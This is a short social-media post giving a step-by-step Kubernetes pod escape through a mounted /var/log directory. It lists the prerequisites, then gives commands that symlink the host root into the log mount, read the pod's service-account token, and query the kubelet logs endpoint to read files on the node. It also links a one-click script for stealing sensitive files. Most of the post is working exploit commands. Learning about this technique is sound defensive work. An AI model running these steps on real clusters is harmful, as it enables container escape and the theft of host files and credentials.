Mount /var/log under k8s to escape

Mount /var/log under k8s to escape

Cheah E. Cheah E.

Cheah E.

发布日期: 2022年6月24日
+ 关注

Prerequisites

  • mounted /var/log
  • The container is in a k8s environment
  • The serviceaccount of the current pod has permission to get|list|watch log

Vulnerability detection

In the Container 

kubectl exec --stdin --tty escaper -- /bin/bash

The /var/log target here is mounted under /var/log/host to create a link 

cd /var/log/host
ln -s / ./root_link

At this point, you can access the files on the node 

token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k https://172.17.0.1:10250/logs/root_link/ -H "Authorization: Bearer $token"

or directly use the script to steal sensitive files with one click

https://github.com/danielsagi/kube-pod-escape

Test at your own risk

#k8s

Reference: https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts

要查看或添加评论,请登录

Cheah E.的更多文章

社区洞察

其他会员也浏览了